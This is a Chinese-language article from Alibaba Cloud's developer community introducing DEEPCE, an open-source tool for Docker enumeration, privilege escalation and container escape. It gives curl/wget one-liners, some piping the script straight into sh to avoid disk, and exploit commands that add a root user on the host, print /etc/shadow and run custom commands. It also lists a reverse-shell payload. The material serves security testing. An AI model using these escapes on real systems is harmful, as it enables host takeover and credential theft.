备案控制台
探索云世界
开发者社区 云原生 容器服务 文章 正文

Docker 枚举、特权升级和容器逃逸 (DEEPCE)

2023-08-24 137
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
容器镜像服务 ACR,镜像仓库100个 不限时长
简介: 为了使其与最大数量的容器兼容,DEEPCE 是纯编写的sh,没有依赖性。如果可用,它将使用其他工具,例如 curl、nmap、nslookup 和 dig,但在大多数情况下不依赖于它们进行枚举。枚举都不应该触及磁盘,但是大多数漏洞利用会创建新的容器,这将导致磁盘写入,并且一些漏洞利用会覆盖 runC,这可能具有破坏性,所以要小心!

为了使其与最大数量的容器兼容,DEEPCE 是纯编写的sh,没有依赖性。如果可用,它将使用其他工具,例如 curl、nmap、nslookup 和 dig,但在大多数情况下不依赖于它们进行枚举。

       枚举都不应该触及磁盘,但是大多数漏洞利用会创建新的容器,这将导致磁盘写入,并且一些漏洞利用会覆盖 runC,这可能具有破坏性,所以要小心!

       可以使用以下单行之一将 DEEPCE 下载到主机或容器上。提示:下载到/dev/shm避免接触磁盘。

wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").c

枚举

以下是 DEEPCE 执行的枚举列表。

  • 容器 ID 和名称(通过反向 DNS)
  • 容器 IP / DNS 服务器
  • 码头工人版本
  • 有趣的坐骑
  • 普通文件中的密码
  • 环境变量
  • 密码哈希
  • 容器中存储的常见敏感文件
  • 同一网络上的其他容器
  • 端口扫描其他容器,以及宿主机本身

漏洞利用

  • Docker 组提权
  • 特权模式主机命令执行
  • 裸露的 Docker

有效载荷

对于上述每个漏洞利用,都可以定义有效负载以利用主机系统。这些包括:

  • 反向 TCP 外壳
  • 打印 /etc/shadow
  • 添加新的根用户
  • 运行自定义命令
  • 运行自定义负载二进制文件
# Make the script executable and then run it
chmod +x ./deepce.sh
./deepce.sh

漏洞利用

以下示例显示了可以执行的不同类型的漏洞利用和可用的有效负载。

  • 利用特权容器在主机操作系统上创建新的 root 用户:
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
  • 利用可写的 docker sock 文件打印内容/etc/shadow
./deepce.sh --no-enumeration --exploit SOCK --shadow
  • 通过主机上 docker 组的成员身份升级到 root 并运行自定义负载
./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"

高级用法

       可以在不接触磁盘的情况下下载和运行 deepce,但是您将无法轻松设置参数(可以使用导出直接操作变量)。

wget -O - https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh | sh

https://github.com/stealthcopter/deepce

文章标签:
容器
Docker
安全
网络协议
Shell
关键词:
容器docker
Docker容器
容器升级
Docker升级
Docker升级容器
H8
目录
相关文章
李振良_阿良
|
3天前
|
存储 Kubernetes Docker
Kubernetes(K8S)集群管理Docker容器(概念篇)
Kubernetes(K8S)集群管理Docker容器(概念篇)
李振良_阿良
21 1
请回答1024
|
3天前
|
存储 Ubuntu 安全
Docker容器常用命令
Docker容器常用命令
请回答1024
15 1
游客799
|
9天前
|
存储 运维 监控
构建高效稳定的Docker容器监控体系
【4月更文挑战第18天】 在现代微服务架构中,Docker容器已成为部署和运行应用的标准环境。随之而来的挑战是如何有效监控这些容器的性能与健康状况,确保系统的稳定性和可靠性。本文将探讨构建一个高效稳定的Docker容器监控体系的关键技术和方法,包括日志管理、性能指标收集以及异常检测机制,旨在为运维人员提供实用的指导和建议。
游客799
14 0
jianz123
|
18天前
|
Linux Docker 容器
docker 容器常用命令
docker 容器常用命令
jianz123
13 0
jianz123
|
18天前
|
Linux Shell 虚拟化
linux 部署docker容器虚拟化平台(二)--------docker 镜像制作方法
linux 部署docker容器虚拟化平台(二)--------docker 镜像制作方法
jianz123
28 0
jianz123
|
18天前
|
存储 Linux Shell
centos 部署docker容器 安装 、基本使用方法(一)
centos 部署docker容器 安装 、基本使用方法(一)
jianz123
32 0
风水道人
|
26天前
|
Kubernetes 网络协议 Docker
Docker 容器的DNS
Docker 容器的DNS
风水道人
28 1
技术小胖子
|
Linux API Docker
docker升级方法
技术小胖子
2485 0
风水道人
|
29天前
|
Docker 容器
进入Docker容器中
进入Docker容器中
风水道人
35 2
洛神灬殇
|
29天前
|
关系型数据库 MySQL Nacos
【深入浅出Nacos原理及调优】「实战开发专题」采用Docker容器进行部署和搭建Nacos服务以及“坑点”
【深入浅出Nacos原理及调优】「实战开发专题」采用Docker容器进行部署和搭建Nacos服务以及“坑点”
洛神灬殇
48 1
云原生

容器服务

热门文章

最新文章

  • 1
    Docker CE 镜像源站
  • 2
    Minikube - Kubernetes本地实验环境
  • 3
    Serverless 成本再优化:Knative 支持抢占式实例
  • 4
    谈谈 Docker Volume 之权限管理(一)
  • 5
    容器镜像服务 Docker镜像的基本使用
  • 6
    使用Docker运行Java Web应用
  • 7
    阿里云容器服务K8S Ingress Controller日志采集实践
  • 8
    杜绝假死,Tomcat容器做到自我保护,设置最大连接数
  • 9
    Kubernetes之路 1 - Java应用资源限制的迷思
  • 10
    DockerCon 2016:阿里专家解读unikernel
  • 1
    Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker 避坑
    34
  • 2
    Kubernetes(K8s)与虚拟GPU(vGPU)协同:实现GPU资源的高效管理与利用
    55
  • 3
    OpenKruise v1.6 版本解读:增强多域管理能力
    94
  • 4
    云计算与大数据:合作与创新
    78
  • 5
    Serverless 成本再优化:Knative 支持抢占式实例
    66381
  • 6
    在 ECS 上启动 minikube 失败的解决办法
    100
  • 7
    一文带你快速学会SpringBoot工程下MaBatis对数据的增删改查功能!
    76
  • 8
    享道出行:容器弹性技术驱动下的智慧出行稳定性实践
    58128
  • 9
    高光回眸:阿里云容器服务如何全面助力精彩亚运
    65131
  • 10
    【Docker系列】Docker-核心概念/常用命令与项目部署实践
    115

    • 相关课程

    更多
  • 现代应用容器技术快速入门
  • 云计算、容器和云原生基础课程
  • 深入解析Docker容器化技术
  • Serverless 容器从入门到精通: - Serverless Kubernetes
  • 基于Docker与Jenkins实现自动化部署
  • 容器安全与Palo Alto Networks解决方案

    • 相关电子书

    更多
  • 阿里云文件存储 NAS 在容器场景的最佳实践
  • 何种数据存储才能助力容器计算
  • 《容器网络文件系统CNFS》

    • 相关实验场景

    更多
  • 基于ACK Serverless实现容器应用弹性伸缩
  • 通过Ingress进行容器应用灰度发布
  • Docker Compose部署案例
  • Docker Compose入门
  • 容器中的volume卷
  • 容器的文件系统挂载

    • 推荐镜像

    更多
  • docker-ce
  • docker-toolbox
  • alpine
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)